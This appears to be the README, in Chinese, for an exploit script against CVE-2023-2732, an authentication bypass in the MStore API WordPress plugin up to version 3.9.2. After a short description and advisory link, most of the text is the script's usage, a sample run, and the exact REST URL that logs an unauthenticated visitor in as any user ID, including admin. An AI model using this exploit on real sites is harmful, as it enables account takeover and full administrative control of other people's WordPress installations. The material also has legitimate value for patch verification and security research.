CVE-2023-2732
MStore API <= 3.9.2 - 认证绕过
https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mstore-api/mstore-api-392-authentication-bypass
描述
用于 WordPress 的 MStore API 插件在版本 3.9.2 及以下存在认证绕过漏洞。这是由于在通过插件进行添加列表 REST API 请求时,对提供的用户验证不足。这使得未认证的攻击者能够以站点上任何现有用户(如管理员)的身份登录,只要他们知道用户 ID。
帮助
usage: mstore-api.py [-h] -u URL
options:
-h, --help 显示此帮助信息并退出
-u URL, --url URL WordPress 站点的 URL
示例用法
python3 mstore-api.py -u http://wordpress.lan
插件版本低于 3.9.3。
选择一个用户:
1. admin
输入用户 ID:1
恭喜,已发现易受攻击的系统。
如何利用:
访问以下 URL:http://wordpress.lan/wp-json/wp/v2/add-listing?id=1
访问 http://wordpress.lan,您应该会以所选用户的身份登录。